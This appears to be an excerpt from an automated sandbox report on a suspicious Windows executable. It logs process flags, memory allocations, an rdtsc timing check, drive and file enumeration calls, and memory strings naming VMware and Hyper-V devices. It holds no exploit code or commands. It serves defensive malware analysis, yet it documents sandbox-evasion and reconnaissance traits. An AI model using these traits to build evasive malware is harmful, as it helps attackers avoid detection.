Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1DBD04D0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1DBD0800000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1DBD05D0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1DBD0B80000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1DBD14B0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1DBD16D0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 1DBD1810000 memory commit | memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 15F35200000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 15F35300000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 15F35400000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 15F356B0000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 15F37000000 memory reserve | memory write watch
Source: C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeMemory allocated: 15F37400000 memory reserve | memory write watch
Source: C:\Windows\explorer.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00BA3880 rdtsc 0_2_00BA3880
Source: C:\Windows\System32\conhost.exe TID: 6656Thread sleep count: 47 > 30Jump to behavior
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00C69E5A __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,0_2_00C69E5A
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B91640 _memset,_memset,_sprintf,FindFirstFileA,_strrchr,_memset,_strncpy,_memset,_sprintf,_memset,_memset,_memset,_memset,_sprintf,FindNextFileA,FindClose,0_2_00B91640
Source: C:\Users\user\Desktop\bkscEXd86b.exeCode function: 0_2_00B91D10 SetServiceStatus,_calloc,_calloc,_sprintf,_memset,_getenv,GetLogicalDrives,_memset,GetLogicalDriveStringsA,_sprintf,GetDriveTypeA,GetDriveTypeA,GetDriveTypeA,_sprintf,_printf,SetServiceStatus,0_2_00B91D10
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ProgramData
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b1~
Source: explorer.exe, 00000007.00000003.310585098.00000000084EA000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000007.00000003.442433219.000000000D02D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}LargeTile.png
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t
Source: explorer.exe, 00000004.00000000.248428809.000000000F734000.00000004.00000001.sdmpBinary or memory string: ?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f563\shD-
Source: explorer.exe, 00000007.00000003.312934031.000000000D00B000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}i
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}j
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}k
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}m
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}n
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: explorer.exe, 00000007.00000003.365654527.000000000D235000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B0
Source: SearchUI.exe, 00000010.00000002.388454921.000001D3D0165000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: explorer.exe, 00000004.00000000.244442266.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.241740682.0000000008220000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.384082578.000001D3CFC00000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA2
Source: SearchUI.exe, 00000010.00000002.392411511.000001DBD0B40000.00000004.00000001.sdmpBinary or memory string: visioitunesvmwarelynconenoteneroexceloutlook.ts.psd.ai&#xEF87.dwgx86amd64LDICobjdobjTOPPFEHbinLRA.vssx.vstxPTMPVD.iniMMUS:wux:.resxMFOL.config.bakIFF.etlIBA.bin.objFL.pdbLM.dllotstotetftutdtrtpto
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: 00100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.324285365.000000000D0A0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B9>
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: 11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B,
Source: explorer.exe, 00000007.00000003.335462967.000000000D09F000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA
Source: explorer.exe, 00000007.00000003.361935461.000000000D202000.00000004.00000001.sdmpBinary or memory string: 6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94fH
